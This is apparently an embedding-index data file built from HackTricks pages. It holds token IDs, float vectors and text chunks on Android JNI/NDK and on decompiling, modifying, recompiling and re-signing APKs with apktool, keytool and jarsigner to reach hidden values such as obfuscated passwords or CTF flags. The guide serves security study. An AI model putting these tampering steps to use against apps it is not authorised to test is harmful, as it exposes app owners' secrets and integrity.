7901, 3992, 9227, 3642, 2062, 3227, 1010, 2021, 2612, 2129, 2000, 6611, 1996, 2062, 2236, 12441, 7901, 3330, 4813, 1010, 4919, 2000, 11924, 1012, 2138, 1996, 3125, 1997, 2023, 8395, 2003, 2025, 2000, 6570, 2017, 1996, 2004, 2213, 4294, 2015, 1010, 2035, 11110, 2097, 2421, 2019, 2849, 1998, 2019, 1060, 20842, 2544, 1997, 1996, 3075, 2000, 2022, 16578, 2061, 2008, 2169, 2711, 2064, 5454, 1996, 4294, 2008, 2027, 2024, 2062, 6625, 2007, 1012, 4083, 2849, 3320, 10128, 2017, 2123, 1521, 1056, 2031, 3025, 12441, 7901, 3330, 1013, 3320, 3325, 1010, 2182, 2024, 2070, 4081, 4219, 1012, 2087, 11924, 5733, 2448, 2006, 2849, 1010, 2021, 2035, 11110, 1999, 2023, 8395, 2036, 2421, 2019, 1060, 20842, 2544, 1997, 1996, 3075, 1012, 2000, 4553, 1998, 1013, 2030, 3319, 2849, 3320, 1010, 1045, 3811, 6592, 1996, 2849, 3320, 24078, 2013, 17207, 11610, 13625, 1012, 4955, 2000, 1996, 9262, 3128, 8278, 1006, 1046, 3490, 1007, 1996, 9262, 3128, 8278, 1006, 1046, 3490, 1007, 4473, 9797, 2000, 13520, 9262, 4725, 2008, 2024, 7528, 1999, 3128, 3642, 1006, 2788, 9227, 1039, 1013, 1039, 1009, 1009, 1007, 1012, 1046, 3490, 8278, 2003, 2025, 11924, 1011, 3563, 1010, 2021, 2003, 2800, 2062, 3227, 2000, 9262, 5097, 2008, 2448, 2006, 2367, 7248, 1012, 1996, 11924, 3128, 2458, 8934, 1006, 1050, 2094, 2243, 1007, 2003, 1996, 11924, 1011, 3563, 5906, 3388, 2006, 2327, 1997, 1046, 3490, 1012, 2429, 2000, 1996, 9986, 2015, 1024, 1999, 11924, 1010, 1996, 3128, 2458, 8934, 1006, 1050, 2094, 2243, 1007, 2003, 1037, 5906, 3388, 2008, 14245, 9797, 2000, 4339, 1039, 1998, 1039, 1009, 1009, 3642, 2005, 2037, 11924, 18726, 1012, 2362, 1010, 1046, 3490, 1998, 1050, 2094, 2243, 3499, 11924, 9797, 2000, 10408, 2070, 1997, 2037, 10439, 1521, 1055, 15380, 1999, 3128, 3642, 1012, 1996, 9262, 1006, 2030, 12849, 19646, 2378, 1007, 3642, 2097, 2655, 1037, 9262, 1011, 4161, 3128, 4118, 2029, 2003, 7528, 1999, 1996, 9227, 1010, 3128, 3075, 1012, 7604, 6525, 14321, 1046, 3490, 9986, 2015, 22895, 2072, 12827, 22895, 2072, 4972, 1026, 1516, 1045, 2467, 2031, 2023, 2028, 2330, 1998, 6523, 2000, 2009, 2096, 7065, 2545, 2075, 11924, 3128, 8860 ]
hack_tricks
423.txt
0
##android jni & ndk [SEP]
[ 0.0900031104683876, 0.4572886824607849, -0.44607511162757874, -0.5382505059242249, -0.6741833090782166, -0.11756984144449234, 0.739457905292511, -0.5824103355407715, 0.581039309501648, 0.7447071671485901, -0.11763253808021545, 0.33861494064331055, 0.5334568619728088, -0.6840943694114685, -0.4990626871585846, 0.6709362268447876, -0.532471239566803, -0.4309673607349396, -0.8510400056838989, 0.6160338521003723, 0.4377199709415436, 0.25415706634521484, -1.4661787748336792, -0.4190347194671631, -0.0059579345397651196, -0.4823424816131592, 0.3044164776802063, 0.6597415804862976, 0.8023133873939514, -0.2891685366630554, 0.22922773659229279, -0.3945048451423645, 0.5112565159797668, -0.18854905664920807, -0.018885629251599312, -1.0596261024475098, 0.186153843998909, -0.42175859212875366, -0.30069252848625183, -0.024911267682909966, 0.7623106837272644, -0.26758402585983276, 0.28954023122787476, -1.0228734016418457, -0.5843989849090576, -0.548200249671936, -0.2040925770998001, -0.5693367123603821, -0.12126094847917557, -0.5207873582839966, -0.6824319958686829, 0.6725881099700928, -0.7682731747627258, 0.47490954399108887, -0.14343644678592682, 0.0054263039492070675, 0.3452622592449188, -0.2654506266117096, -0.5037378668785095, -0.47524356842041016, -0.28824976086616516, 0.9702895283699036, 0.5016214847564697, -1.438744068145752, 0.6622961163520813, 0.34174346923828125, -0.431335985660553, 0.3150465786457062, 0.14041030406951904, -0.38261428475379944, -0.6160457134246826, 0.9413007497787476, -0.27768978476524353, -1.2173584699630737, 0.04240432009100914, 0.3491552472114563, 0.1246921718120575, 0.5952048301696777, 0.24279509484767914, 0.5142139792442322, 0.4166622459888458, 0.74147629737854, -0.5454742908477783, -0.413821816444397, -1.2335331439971924, -0.22196108102798462, 0.09415280818939209, -0.7722546458244324, -0.7617570757865906, -0.07954706996679306, -0.1816028356552124, 0.5325495004653931, -0.10926549136638641, 0.615658164024353, 0.013715597800910473, 0.2892284691333771, -0.6839005947113037, 0.5352010726928711, 0.6669236421585083, -0.4076075851917267, 0.46836918592453003, 0.32271304726600647, -0.5529170632362366, -0.27739110589027405, -0.2615320086479187, -0.6087799668312073, -0.1589392125606537, -0.5945605635643005, -0.04496092349290848, -0.7719759345054626, 1.5108059644699097, -0.36307641863822937, -0.1240260973572731, 0.0824563130736351, 0.7627832293510437, 0.35471129417419434, -0.5086973309516907, 0.5810756087303162, -0.4034631848335266, -0.5028064846992493, 0.6991675496101379, -1.0081708431243896, 0.6260343790054321, -0.11352116614580154, -0.19182704389095306, -0.346804141998291, -0.46104419231414795, 0.9747560620307922, 0.05665384232997894, -0.19236281514167786, 0.12243983894586563, -0.046563323587179184, 0.06283292174339294, 0.31031334400177, -0.3962184190750122, -0.26647448539733887, -0.45381492376327515, -0.024220969527959824, 0.7391135096549988, -0.5738104581832886, -0.18882805109024048, -0.8903570771217346, -0.017230266705155373, 1.5643277168273926, 0.08131571114063263, -0.11455301940441132, -1.335802674293518, 0.5637476444244385, -0.7668506503105164, 0.04244677722454071, -0.22046281397342682, 0.10390695929527283, 0.1288367360830307, 0.7863028645515442, 0.268833190202713, 0.7175580263137817, 0.05395693704485893, 0.8897004723548889, 1.23276686668396, 0.2516322731971741, 0.5665361881256104, -0.12711721658706665, -0.3666565716266632, 0.8175787329673767, 0.18581613898277283, 0.8484421968460083, -0.46037569642066956, -0.8258347511291504, 0.5917447209358215, -0.09880100935697556, 0.17162224650382996, -0.09189976006746292, -0.045497700572013855, 0.019716836512088776, 0.5703068971633911, 0.23237872123718262, 1.2740839719772339, 0.34522828459739685, 0.8224652409553528, 0.5403985977172852, -0.2873573899269104, -0.2089671790599823, 0.3013608455657959, 0.3432439863681793, -0.08155734091997147, 0.5365766286849976, 0.5250135064125061, -0.13970139622688293, -0.6378254890441895, 0.17307224869728088, -0.720603346824646, 0.5045167803764343, -1.0032745599746704, 0.7078953981399536, -0.8335358500480652, 0.8291991949081421, 0.34374791383743286, -0.16055214405059814, -0.19125144183635712, -1.0885554552078247, -0.01917015202343464, 0.5168321132659912, -0.42367687821388245, -0.8136739730834961, -0.18631203472614288, -0.4438328742980957, 0.8038330078125, 0.7967382073402405, -0.16754847764968872, 0.6484568119049072, 0.08996951580047607, 0.054528940469026566, -0.7157305479049683, 0.20757237076759338, -0.061223749071359634, 0.5535677075386047, 0.8432667851448059, 0.785991907119751, -0.28550228476524353, 0.7484070062637329, 1.343894600868225, 0.7271497845649719, 0.3537876605987549, -0.013146552257239819, -1.3513741493225098, -0.18491795659065247, -0.1249227523803711, -0.26899629831314087, -0.7103424072265625, -0.32619917392730713, 0.13746006786823273, 0.5854861736297607, -0.3531634211540222, 0.9400096535682678, 0.5949447154998779, 0.4395066201686859, 0.5840291976928711, 0.3029179275035858, -0.11816604435443878, -0.006815612781792879, -0.1674833744764328, 0.605475127696991, -0.6070513129234314, 0.2119862288236618, 0.7946473360061646, -0.7834139466285706, -0.2372540831565857, 0.015246350318193436, -0.49591657519340515, 0.309661328792572, -0.1891399770975113, 0.7749089002609253, 0.6920433640480042, -0.23953616619110107, -0.9119524359703064, -0.9653813242912292, 0.03888115659356117, 0.15342530608177185, 0.24001456797122955, -0.8942908644676208, 0.5297982096672058, -0.06321925669908524, -0.8488264083862305, -0.3012808859348297, -0.36259201169013977, 1.2859783172607422, 0.2647801339626312, 0.07814819365739822, -0.018609855324029922, -0.1082390546798706, -0.9235653877258301, -0.4052713215351105, -1.1259360313415527, 0.028372246772050858, -1.103918433189392, -0.7360407114028931, 1.4975762367248535, -1.0390853881835938, 0.07026197761297226, -0.2950369715690613, 0.5484476685523987, -0.20361489057540894, 0.5348877310752869, 0.19079747796058655, 0.6877862215042114, 0.13037563860416412, -0.006405513733625412, 0.8132022619247437, -0.1365550011396408, 0.09619636833667755, -0.3693462610244751, 0.2951222360134125, 0.8506577610969543, 0.13624732196331024, 0.4855087101459503, -0.2148270457983017, -0.8220865726470947, -0.00447178166359663, -0.42441287636756897, 0.43904557824134827, -0.3181268572807312, -0.6636876463890076, 0.9056490063667297, 0.4453192353248596, 0.06907393783330917, 0.07950811833143234, 0.6151817440986633, -0.28212642669677734, 1.2353047132492065, -0.3348813056945801, -0.07171405106782913, -0.24204939603805542, 0.47772055864334106, 0.4787081778049469, -0.7042922973632812, 0.8214438557624817, -0.12590758502483368, -0.2584649920463562, -0.7869675159454346, -0.7695387005805969, -0.27724459767341614, -0.18680280447006226, -0.587335467338562, -0.09027479588985443, 0.4767768085002899, 0.47559431195259094, -0.30053219199180603, -1.068643569946289, -0.2580174207687378, -0.8600628972053528, -0.013725201599299908, 0.233868807554245, 0.21095749735832214, 0.619701623916626, -0.4403964877128601, 0.926746666431427, 0.07248993963003159, -0.2637101113796234, -0.26721322536468506, -0.7778009176254272, 0.6182654500007629, -0.5461974143981934, 0.5003228187561035, -0.187347412109375, 0.25139546394348145, -0.5270935297012329, -0.14443989098072052, -0.31133681535720825, 0.7604233026504517, -0.07862585037946701, -0.4510488510131836, -0.42328664660453796, 0.028027279302477837, -0.31789350509643555, 0.8926252126693726, 0.3435072600841522, -0.21271494030952454, -0.38533246517181396, 0.3287549912929535, -0.7550281882286072, 0.197409525513649, 0.26173490285873413, 0.7311172485351562, -0.21759465336799622, -0.17755098640918732, -0.6212815642356873, -0.07559972256422043, 0.20815269649028778, 0.8279276490211487, -0.1334766000509262, 0.6500670909881592, -0.089936263859272, 0.0015885489992797375, 0.9748340845108032, -0.06530310958623886, 0.11859169602394104, 1.4614139795303345, 0.37208205461502075, 0.9330748915672302, -0.8361671566963196, -0.43536433577537537, -0.06444709748029709, -0.15387746691703796, 0.6890890002250671, 0.208247110247612, 0.6696768999099731, -0.12604820728302002, 0.18829739093780518, -0.8199588060379028, 0.19946084916591644, 0.14095333218574524, 0.1316060572862625, 0.5092559456825256, -0.009563488885760307, -0.6237569451332092, -0.3078418970108032, 0.2844763994216919, 0.6689565777778625, 0.9889070987701416, 0.8988879919052124, 0.29377245903015137, -0.32116442918777466, 0.20946179330348969, 0.13380348682403564, -0.3762681782245636, -0.24563473463058472, -0.06579168885946274, 0.27161338925361633, -0.419795423746109, -0.32331007719039917, -0.6488772034645081, -0.5818164348602295, -0.755666196346283, 0.10802061855792999, -0.5240010619163513, 0.5029221177101135, 0.8187740445137024, 0.3644312024116516, -0.32812944054603577, 0.3573589026927948, -0.28470849990844727, 0.3499262034893036, -1.1694148778915405, 0.5893124938011169, 0.4566270411014557, -0.2673532962799072, -0.20422376692295074, 0.019077815115451813, -0.13967467844486237, 0.3891802728176117, 0.09533093124628067, -1.0789031982421875, -0.09487927705049515, -0.060373611748218536, -0.730411946773529, 0.50274258852005, 1.388993263244629, 0.11678385734558105, 0.19815027713775635, -0.41706395149230957, 0.10215447098016739, 0.729240357875824, -0.10118626803159714, -0.18476560711860657, 0.19829870760440826, 0.19279058277606964, 0.008778249844908714, -0.16399116814136505, 0.409987211227417, 1.122390866279602, 0.6088599562644958, -0.9930872917175293, -0.05556604638695717, -0.2587975263595581, -0.9432018995285034, -0.2326192855834961, 0.06211330369114876, -0.30244147777557373, 0.574388861656189, -0.21642014384269714, -0.5447530746459961, -0.7881365418434143, 1.0951812267303467, -0.6682322025299072, 0.023556804284453392, 0.45042532682418823, -0.575616717338562, 0.2546093463897705, 0.817960262298584, 0.22723349928855896, -0.45959213376045227, -0.2595316469669342, 0.5599036812782288, -0.7349651455879211, 0.7143067121505737, -0.10327073931694031, 0.47112134099006653, -0.3434678018093109, -0.2296687811613083, 0.5198174715042114, -0.23580512404441833, 0.41503724455833435, 0.1440940648317337, -0.5477504134178162, 0.18416543304920197, -1.0904210805892944, 0.027387375012040138, 0.2721653878688812, -0.1624196320772171, 0.9238688945770264, 0.13394618034362793, -0.6523486971855164, -0.019294574856758118, 0.4125358462333679, 0.3644244074821472, -0.20095764100551605, -0.4451792538166046, -0.9166272878646851, 1.0128358602523804, -0.02999071031808853, 0.6913390755653381, -0.34678712487220764, -0.9073102474212646, 0.8384021520614624, -0.41875508427619934, 0.234681636095047, -0.547497034072876, 0.2624494731426239, -0.568056583404541, -0.639890730381012, -0.7010293006896973, 0.05211588740348816, 0.1710241585969925, -0.31116053462028503, 0.056991010904312134, 0.4065626263618469, 0.5557631850242615, -0.9108620882034302, -1.4433180093765259, 0.7349862456321716, 0.70631343126297, -0.5614781379699707, -1.4198275804519653, -0.325035959482193, 0.3566631078720093, 0.18011602759361267, -0.13577039539813995, -0.3210708498954773, -0.8682237267494202, 0.19787637889385223, 0.6787564158439636, -0.5044904351234436, -0.1028541699051857, -0.36498454213142395, 0.205864816904068, -0.42399919033050537, 0.5623695850372314, 0.31539055705070496, -0.7862597107887268, -0.06630118936300278, -0.22033964097499847, -0.06509388983249664, -0.3079374432563782, 0.22725746035575867, -0.7771157622337341, 0.1735578328371048, -0.6717777252197266, 0.597838282585144, 0.4281240701675415, 0.0000277708750218153, -0.3143565058708191, 1.0229015350341797, -0.2998553514480591, 0.8935747146606445, -0.8705655932426453, -0.46369749307632446, 0.7001826167106628, -0.3810856342315674, -0.22916261851787567, 0.8755531907081604, -0.24109263718128204, 0.43071332573890686, 0.030354304239153862, 0.12107868492603302, -0.41472116112709045, 0.6045669913291931, -0.3514912724494934, 0.14810971915721893, -0.2496858388185501, 0.06781771034002304, 0.22078290581703186, 0.23591236770153046, -0.02017897367477417, 0.31382009387016296, 0.3414064347743988, -0.4121738374233246, 0.12430588155984879, -0.6519602537155151, -1.18082857131958, 0.03842489421367645, -0.6615411639213562, 0.07283656299114227, 0.22942140698432922, -0.5012193918228149, 0.010859348811209202, -1.1085668802261353, -0.4085110127925873, 0.774526834487915, 0.6235607266426086, 0.21602897346019745, -0.48688048124313354, 0.3495306670665741, 0.7511791586875916, -1.4261956214904785, -0.49301210045814514, -0.5694558620452881, -0.05057152360677719, -0.028608160093426704, -0.4869302809238434, -1.0042798519134521, -0.7746381163597107, 0.8979476094245911, 0.12980608642101288, 0.14384183287620544, 0.17545108497142792, 0.5935618877410889, -1.324494481086731, -0.39078548550605774, 1.0712049007415771, -0.19944386184215546, -0.10067865252494812, 1.3323091268539429, 0.3774479627609253, 0.2860124409198761, 1.2410404682159424, -0.32744142413139343, 0.5558469891548157, 0.0022521454375237226, 0.6229079961776733, -0.028221314772963524, -0.6468912363052368, 0.26545435190200806, -0.15712080895900726, -1.1288173198699951, 0.43947458267211914, 0.4527445435523987, 0.9099531769752502, -0.39815670251846313, -0.7635236978530884, -0.272714763879776, -0.194672629237175, -0.21017861366271973, -0.1787720024585724, 0.09103520214557648, -0.7572581768035889, 0.2825021743774414, -0.29204416275024414, 0.3838750720024109, -0.3353748917579651, 1.0909478664398193, 0.6692081689834595, -0.36357438564300537, -1.1021333932876587, -0.1749260276556015, -0.08132237941026688, -0.8903516530990601, -0.3343210816383362, 0.591999888420105, 0.33026552200317383, 0.8042727112770081, 0.2783506214618683, 0.5216524600982666, 1.4317296743392944, 0.1704866886138916, -0.10070160776376724, 0.06818882375955582, -1.0811092853546143, -0.9172558784484863, -0.6359143853187561, -0.043138910084962845, -0.8461480736732483, 0.7863630652427673, 0.3346463441848755, 0.883864164352417, -0.12323419749736786, 0.7322340607643127, -0.028485119342803955, -0.5731713175773621, -0.6223179697990417, 0.2041928768157959, 0.2006973922252655, -0.010293981060385704, -0.45277494192123413, 0.18934661149978638, -0.13368088006973267, -0.05191439017653465, -0.3326035737991333, 0.12376635521650314, 0.16432899236679077, 0.38906562328338623, -0.33791354298591614, -0.45991119742393494, -0.2875961363315582, -0.5291600227355957, -1.4034074544906616, -0.42913174629211426, -0.3346974551677704, -0.496088445186615, 0.2548322379589081, 0.0731779932975769, -0.6245536804199219, -0.33190298080444336, 1.216371774673462, -0.4505704939365387, 0.2741394639015198, -0.2495260238647461, 0.1430031806230545, -0.2917368412017822, 0.1516520082950592, 0.23604613542556763, -0.008461210876703262, 0.927710235118866, -0.6960887908935547, 0.23784446716308594, 0.3007698655128479, 0.12482727319002151, 0.006123508792370558, -0.15160240232944489, -0.2409626543521881, -0.3730439841747284, 0.10300718992948532, -0.4177355468273163, 0.9090403914451599, -0.8891352415084839, 0.10353676229715347, 0.07152214646339417, 0.15186281502246857, -0.5150139331817627, 0.21605540812015533, 0.0994369238615036, 0.637766420841217, 0.01414642482995987, 0.004742552060633898, -0.3855437934398651, 0.2050255686044693, 1.0382627248764038, 0.750762403011322, 0.6926366090774536, 0.9088791608810425, -0.18863064050674438, -0.896513819694519, -0.11173485219478607, -0.37845784425735474, -0.021945057436823845, 0.7898348569869995, 0.10235369205474854, 0.20996300876140594, -0.8196977376937866, 0.15886066854000092, -0.16789834201335907, -0.1535186469554901, 0.41550934314727783, -0.1303926706314087, 0.20092640817165375, 0.33412685990333557, -0.20756690204143524, 0.40068984031677246, -0.9412625432014465, -0.8297017812728882, 0.04874398931860924, -1.798004388809204, 0.40794193744659424, -0.2658185660839081, -0.19143564999103546, 0.6452524662017822, 0.1211133599281311, -0.17922057211399078, -0.10778617858886719, -0.4825350046157837, 0.9921212196350098, 0.07997044175863266, -1.2473586797714233, -0.3716983497142792, 0.35272103548049927, 0.42614609003067017, -0.6684312224388123, -0.4582643508911133, -0.237770214676857, 1.6523796319961548, 0.07669191807508469, -0.6313822269439697, -0.8682716488838196, -0.29256707429885864, 0.08253946900367737, 0.9312639832496643, -0.5946304202079773, 0.6570772528648376, -0.8525501489639282, -0.02975059486925602, -0.5795750617980957, 0.25225338339805603, -1.0616002082824707, -0.027352994307875633, 0.5634498000144958, 0.31287670135498047, 0.4810973107814789, 0.48948660492897034, 0.5253360271453857, -0.060375362634658813, 0.6946881413459778, -0.5315990447998047, 0.947311520576477, 0.7718827724456787, -0.15810434520244598, 0.6945925951004028, 0.36615559458732605, 0.029136933386325836, 1.2017637491226196, 0.11225099861621857, 1.3978666067123413, 0.5740035176277161, -0.31282415986061096, -0.001967665972188115, 1.006202220916748, -0.1456044465303421, -0.694226086139679, -0.36814993619918823, -0.8296334743499756, 0.25136762857437134, 0.47670358419418335, 0.29364830255508423, -0.4318090081214905, -0.2888280153274536, -0.1757485270500183, 0.21463848650455475, 0.6101222634315491, 0.21010619401931763, -1.627090573310852, 0.719456672668457, -0.282270610332489, 0.21047349274158478, 0.9752622842788696, -0.23957540094852448, -0.1555682122707367, 0.21026688814163208, -0.25708311796188354, 0.3005395233631134, 0.05613594129681587, 0.7592870593070984, -0.08391288667917252, -0.14874888956546783, -0.5722343325614929, 0.07113756239414215, -0.23077736794948578, -0.3560020625591278, 1.2566416263580322, -0.08172673732042313, -1.0245630741119385, 0.5657621026039124, 0.501920759677887, -0.7841324210166931, 0.18846838176250458, -0.4046573042869568, -0.6543828845024109, -1.1261905431747437, 0.2731926441192627, -0.41841447353363037, -0.4015170633792877, 0.5342249870300293, 0.2250974327325821, -0.3237127959728241, 0.46504178643226624, -1.4155219793319702, 0.5955857634544373, 0.5438263416290283, 0.6091200113296509, -0.6758317947387695, 0.9383682608604431, 0.16769878566265106, 0.12007869780063629, -0.4086036682128906, -0.10753079503774643, -0.12046491354703903, -0.21033696830272675, 0.4950009286403656, -0.3171907961368561, -0.2976955473423004, -0.7394691109657288, -0.8697407245635986, -0.016919229179620743, 0.002902107546105981, -0.7318155765533447, -0.12005101144313812, 0.00045520486310124397, 0.12427585572004318, -0.35144495964050293, -0.4685712456703186, 0.9327476024627686, 0.5004015564918518, -0.0708870142698288, 0.026492973789572716, -0.08931830525398254, -0.4193742573261261, -0.28386834263801575, -0.9332532286643982, 0.9269567131996155, -0.7736017107963562, -0.2710954546928406, 0.47553643584251404, -0.39260661602020264, 0.46213534474372864, -0.7563837766647339, -0.10239890217781067, 0.16380973160266876, 0.24849657714366913, 0.2531892955303192, 0.3744426965713501, 1.7832099199295044, -0.11852104216814041, 0.23995190858840942, -0.005067270249128342, 1.2235584259033203, -0.022914161905646324, 0.9527520537376404, 0.40529122948646545, 0.3989601135253906, 0.2715560495853424, 0.03551362082362175, -0.08922607451677322, -0.892031192779541, 0.0693841427564621, -0.07923107594251633, -0.20066463947296143, -0.10438041388988495, -1.0572090148925781, -0.2044631987810135, -0.1461276113986969, -0.0028513548895716667, 0.43586862087249756, 0.06550802290439606, 0.3270514905452728, -1.312682032585144, -0.14032326638698578, -1.2729231119155884, -0.46537715196609497, -0.5947317481040955, -0.6136636734008789, 0.11421545594930649, -1.2236560583114624, 3.581745147705078, 0.8260970711708069, 0.508088231086731, 0.48723065853118896, -0.06719549000263214, 0.7254159450531006, -0.10284998267889023, -0.5619691014289856, -0.058249007910490036, -0.7712494730949402, 0.4364166557788849, -0.19145211577415466, 0.30354130268096924, 0.5321645140647888, -0.7670807838439941, 0.8067939877510071, -0.5809153914451599, -0.16381239891052246, 0.8301911950111389, -0.524441659450531, -1.1233078241348267, 0.7013781666755676, 0.32267260551452637, 0.17957758903503418, -0.4561404883861542, 0.14588183164596558, -0.042129140347242355, -0.2274206280708313, -0.40516361594200134, 0.20979803800582886, 0.5296784043312073, -1.0022739171981812, 0.5673081874847412, 0.37563472986221313, 0.03241710737347603, -0.036986421793699265, 0.12636734545230865, -0.5777055621147156, -0.2132202684879303, 0.42640000581741333, -0.2942424416542053, -0.14825908839702606, -0.550956666469574, -0.43157050013542175, 0.23772186040878296, 0.02151137962937355, 0.22864051163196564, -0.5084391832351685, 0.9564991593360901, -0.7130444645881653, 1.0394541025161743, -1.4974827766418457, -0.0791802927851677, -0.6527795195579529, -1.154906153678894, -0.6760123372077942, -0.6443738341331482, 0.3913135230541229, 0.6722774505615234, -1.1313421726226807, 0.11645267903804779, -0.0053505622781813145, -0.4008178412914276, -0.3034226596355438, -0.5257064700126648, 0.4235652983188629, -0.09723656624555588, 0.5360641479492188, -0.8267877697944641, -0.4989411234855652, -0.45404189825057983, -0.20804759860038757, -0.9066221714019775, 0.18394334614276886, 0.6373492479324341, 1.1114674806594849, 0.1263858675956726, 1.0486241579055786, -0.7272167205810547, -0.35096025466918945, 0.011173044331371784, 0.1516091525554657, 1.0674713850021362, -0.1342896968126297, 0.7926682829856873, 0.9439848065376282, 0.5289395451545715, 0.7892482280731201, -0.24962863326072693, -0.2831054627895355, 0.7935709357261658, 1.14901602268219, -0.03909919038414955, 0.3843955099582672, -0.12168394774198532 ]
[ 5685, 22943, 1046, 3490, 1004, 1050, 2094, 2243, 102 ]
hack_tricks
423.txt
1
[CLS] smali - decompiling / [ modifying ] / compilingsometimes it is interesting to modify the application code to access hidden information for you ( maybe well obfuscated passwords or flags ). then, it could be interesting to decompile the apk, modify the code and recompile it. opcodes reference : url wayusing visual studio code and the apklab extension, you can automatically decompile, modify, recompile, sign & install the application without executing any command. another script that facilitates this task a lot is url the apkusing apktool you can access to the smali code and resources : apktool d app. apkif apktool gives you any error, try installing the latest versionsome interesting files you should look are : res / values / strings. xml ( and all xmls inside res / values / * ) androidmanifest. xmlany file with extension. sqlite or. dbif apktool has problems decoding the application take a look to url or try using the argument - r ( don't decode resources ). then, if the problem was in a resource and not in the source code, you won't have the problem ( you won't also decompile the resources ). change smali codeyou can change instructions, change the value of some variables or add new instructions. i change the smali code using vs code, you then install the smalise extension and the editor will tell you if any instruction is incorrect. some examples can be found here : smali changes examplesgoogle ctf 2018 - shall we play a game? or you can check below some smali changes explained. recompile the apkafter modifying the code you can recompile the code using : apktool b. # in the folder generated when you decompiled the applicationit will compile the new apk inside the dist folder. if apktool throws an error, try installing the latest versionsign the new apkthen, you need to generate a key ( you will be asked for a password and for some information that you can fill randomly ) : keytool - genkey - v - keystore key. jks - keyalg rsa - keysize 2048 - validity 10000 - alias < your - alias > finally, sign the new apk : jarsigner - keystore key. jks path / to / dist / * < your
[ 0.008360042236745358, -0.1271858513355255, -0.8201044797897339, 0.9194758534431458, 0.4131981432437897, -0.7536740899085999, -0.32249751687049866, -0.16396711766719818, -0.05255698040127754, 0.41151079535484314, 0.22292450070381165, 0.5712174773216248, -0.17790521681308746, -0.8947278261184692, -0.45733317732810974, -0.11763778328895569, -0.27632731199264526, -0.4061557650566101, -0.7569558620452881, -0.3135533630847931, 0.22624675929546356, 0.220234215259552, -0.8133053183555603, -0.582099974155426, -0.5823109745979309, 0.2871215045452118, -0.311227411031723, -0.014313818886876106, 0.8003807663917542, 0.23671212792396545, 0.1391305923461914, 0.20411056280136108, -0.17184999585151672, -0.40658822655677795, 0.5982292294502258, -0.22743473947048187, 0.7023568153381348, -0.25764358043670654, -0.08337472379207611, -0.665941059589386, 0.690065324306488, 0.09734530746936798, 0.029495559632778168, -0.4522816836833954, -0.8982734680175781, -0.8345659375190735, -0.2657676041126251, -0.5777344703674316, 0.8065550327301025, 0.37992042303085327, -0.011209282092750072, 0.06678684055805206, -0.3728265166282654, 0.21921131014823914, -0.16368289291858673, -0.6982985138893127, 0.20415043830871582, -0.20798058807849884, -0.21391010284423828, 0.4392644464969635, -0.8155982494354248, 0.3079114258289337, 0.10421650856733322, -1.0302207469940186, -0.3378896117210388, 0.5552002191543579, -0.30379536747932434, -0.4365529716014862, -0.39751023054122925, -0.7339041233062744, -0.07975810766220093, 0.5647545456886292, -0.6672119498252869, -0.40869206190109253, -0.5845448970794678, -0.2695941627025604, -0.06873885542154312, -0.1074848398566246, 0.002735474146902561, 0.6762192249298096, 0.06475980579853058, 0.16821430623531342, 0.17814311385154724, 0.20340538024902344, -0.17904342710971832, -0.18327628076076508, 0.8517584204673767, 0.9299972057342529, -0.9448044896125793, 0.3092578649520874, 0.09387475997209549, 0.5647698044776917, -1.022507905960083, -0.02447708137333393, 0.7146137356758118, 0.9868419170379639, -0.5801084041595459, -0.5768862366676331, 0.1203591600060463, -0.2664439082145691, 1.3757288455963135, 0.39702409505844116, 0.4807511568069458, 0.3457016944885254, 0.09652415663003922, 0.6678504347801208, 0.08632468432188034, -0.41285988688468933, -0.5166650414466858, -0.15535381436347961, 0.5706214308738708, -0.2544969916343689, 0.2801222503185272, -0.15985894203186035, -0.19796201586723328, 0.7645551562309265, 0.20228034257888794, 0.43184080719947815, -0.5014905333518982, -0.1539953500032425, 0.07170931994915009, 0.8842577934265137, 0.4747430682182312, -0.03219810128211975, 0.2352628856897354, -0.5349135994911194, 0.44608521461486816, 1.2074445486068726, -0.9247512221336365, -0.501173198223114, -0.4312916100025177, -0.46194902062416077, 0.24137797951698303, 0.42381465435028076, -0.7904810309410095, 0.33837875723838806, 0.3094314932823181, -0.21123839914798737, 0.8258839845657349, -0.8860827684402466, -0.09919437766075134, 0.5249937772750854, 0.648479163646698, 1.4789471626281738, 0.07028131186962128, 0.17105697095394135, -0.7093571424484253, -0.11659732460975647, -0.4249073565006256, 0.2327820062637329, -0.6249980330467224, 0.36190924048423767, 1.1224391460418701, 0.23043273389339447, -0.568831205368042, 0.07555409520864487, -0.5140602588653564, -0.21023744344711304, -0.9038434624671936, -0.2330702692270279, -0.617903470993042, 0.5244131088256836, 0.1642865091562271, 0.31629428267478943, 0.22599360346794128, 0.8475828170776367, -0.8475456237792969, -0.3272138833999634, 0.05810912325978279, -0.04593631625175476, 0.2806914448738098, 0.21666604280471802, 0.01829332299530506, 0.7020192742347717, 0.9028685688972473, 1.2838690280914307, 0.09753091633319855, -0.3157292604446411, 0.13334287703037262, 0.44175201654434204, -0.5902702808380127, 0.4055824279785156, 0.0034285697620362043, 1.206373691558838, 0.17348645627498627, 0.24753384292125702, 0.4687561094760895, -0.6350017786026001, -0.06883943825960159, 0.13542185723781586, -0.5758094787597656, 0.8254299759864807, -0.033263638615608215, 0.6241515874862671, 0.6125126481056213, -0.31113529205322266, -0.6712837815284729, -0.15905039012432098, -0.2291908860206604, -1.7855058908462524, -0.5114091038703918, 0.768684446811676, 0.02608508989214897, 0.11196200549602509, -0.7800516486167908, -1.1253225803375244, 0.33235976099967957, 0.5509615540504456, -0.04545348882675171, 0.46497851610183716, 0.729495108127594, -0.17072518169879913, -0.0890059769153595, 0.23025189340114594, -0.11213336139917374, 0.24292343854904175, -0.4360653758049011, 0.48948565125465393, 0.22399687767028809, 0.35036981105804443, 0.3891650438308716, 0.5134759545326233, 0.5530683398246765, 0.20612485706806183, -0.8280869722366333, -0.636660635471344, 0.46495646238327026, 0.13427913188934326, -0.7631308436393738, -0.1360751837491989, -0.16934806108474731, 0.47695618867874146, -0.2741169333457947, 1.0510847568511963, 0.19122309982776642, -0.001201470149680972, 0.49629777669906616, 0.5644859075546265, -0.15492920577526093, -0.1916733980178833, -0.24463120102882385, 1.0545287132263184, -0.13348574936389923, 1.0224348306655884, 0.6532865166664124, 0.012985148467123508, 0.3479224443435669, -0.22098863124847412, 0.22376413643360138, 0.4943784773349762, -0.30380091071128845, 0.7679873108863831, 0.5340096354484558, 0.43558862805366516, -0.340514600276947, -0.19637981057167053, 1.1152522563934326, 0.1753316968679428, 0.16758936643600464, 0.02396235428750515, 0.2631211578845978, -0.4566913843154907, 0.05429404601454735, -0.07591701298952103, 0.19629596173763275, 0.3474979102611542, 0.11229688674211502, 0.16647294163703918, 0.09728425741195679, -0.4603957235813141, -0.5825539827346802, 